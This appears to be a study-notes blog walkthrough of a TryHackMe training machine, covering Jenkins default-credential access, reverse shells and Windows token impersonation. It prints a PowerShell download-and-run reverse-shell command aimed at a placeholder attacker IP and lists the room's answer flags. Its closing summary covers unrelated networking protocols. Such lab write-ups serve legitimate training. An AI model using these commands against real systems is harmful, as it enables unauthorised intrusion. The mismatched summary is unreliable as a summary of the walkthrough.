This article is a walkthrough of the “Alfred” machine on TryHackMe, part of the Offensive Security pathway. The presenter demonstrates how to exploit the machine and perform privilege escalation using various techniques.

E-learn Junior Penetration Tester (eJPTv2) Study Notes

HackTheBox CPTS Study Notes

Overview of Alfred Machine

Tools Used: Exploitation involved tools like Netcat, Metasploit, PowerShell, and MSFVenom.

Machine Setup: Alfred has 3 main open ports: 80, 389, and 8080.

Port 80: Basic web page.

Port 8080: Admin panel for a Jenkins server.

Initial Exploitation

Accessing Jenkins

  • Jenkins is a software development and automation tool often used for continuous integration.
  • The admin panel was accessed using default credentials (admin:admin), a common vulnerability.

Reverse Shell Creation

  • Once logged into Jenkins:
    • Exploited its ability to run shell commands.
    • Used various techniques to establish a reverse shell:
      1. Netcat Reverse Shell: Uploaded a Netcat binary to the target using Jenkins commands.
      2. PowerShell Reverse Shell: Used a custom script to gain access.
      3. MSFVenom Payload: Generated a payload using Metasploit to obtain a Meterpreter session.

Windows Privilege Escalation

Windows Token Impersonation

  • Impersonation is the key to escalating privileges in Windows systems.
  • Checked user privileges:
    • Found impersonation privilege and delegation privilege, enabling token impersonation.
  • Used Metasploit’s Incognito module:
    • Listed available tokens.
    • Impersonated the administrator token to gain full system access.

Manual Method

  • As an alternative, downloaded a tool to manually list and impersonate tokens, which could be done without Metasploit.

Key Insights

  1. Default Credentials: Often overlooked, default credentials are still a major vulnerability.
  2. Privilege Escalation via Tokens: Windows token impersonation is a critical skill in pentesting.
  3. Redundancy in Exploitation: Demonstrating multiple ways (Netcat, PowerShell, Metasploit) ensures flexibility in real-world scenarios.

Interesting Facts

  • Jenkins is widely used in software development but is frequently misconfigured, making it a common target for attackers.
  • The impersonation privilege in Windows systems allows non-admin users to perform tasks as higher-privileged users if exploited.

TryHackMe Alfred | Room Answers

How many ports are open? (TCP only)

3

What is the username and password for the login panel? (in the format username:password)

admin:admin

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString(‘http://your-ip:your-port/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

You first need to download the Powershell script and make it available for the server to download. You can do this by creating an http server with python: python3 -m http.server

No answer needed

What is the user.txt flag?

79007a09481963edf2e1321abd9ae2a0

What is the final size of the exe payload that you generated?

73802

To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available.

Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators’ token. What is the output when you run the getuid command?

NT AUTHORITY\SYSTEM


Read the root.txt file located at C:\Windows\System32\config

dff0f748678f280250f25a45b8046b4a

Video Walkthrough

Summary

  1. Dynamic Host Configuration Protocol (DHCP): Simplifies network management by automatically assigning IP addresses to devices, reducing manual configuration errors.
  2. Address Resolution Protocol (ARP): Essential for translating IP addresses into MAC addresses, ensuring accurate data delivery within local networks.
  3. Internet Control Message Protocol (ICMP): Facilitates network diagnostics by reporting errors and providing operational information, crucial for maintaining network health.
  4. Open Shortest Path First (OSPF): A link-state routing protocol that dynamically updates routing tables, optimizing data transmission paths in large networks.
  5. Domain Name System Security Extensions (DNSSEC): Adds a layer of security to DNS by validating responses, protecting against attacks like cache poisoning.
  6. Secure Shell (SSH): Enables secure remote access to systems, encrypting sessions to prevent eavesdropping and unauthorized access.
  7. Secure Sockets Layer/Transport Layer Security (SSL/TLS): Encrypts data between web servers and clients, safeguarding information transmitted over the internet.
  8. Internet Protocol Security (IPsec): Secures IP communications by authenticating and encrypting each IP packet, widely used in VPNs for secure remote connectivity.
  9. Virtual Private Network (VPN): Creates a secure tunnel over public networks, allowing safe data transmission and remote access to network resources.
  10. Simple Mail Transfer Protocol Secure (SMTPS): Secures email transmission by wrapping SMTP with TLS, ensuring that emails are encrypted during transit.

Conclusion

Understanding networking protocols is crucial for efficient network management and security. Protocols such as DHCP automate IP address allocation, ARP resolves IP addresses to MAC addresses, ICMP facilitates network diagnostics, and routing protocols like OSPF determine optimal data paths. Mastering these protocols enhances one’s ability to design, troubleshoot, and secure networks effectively.

,
Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles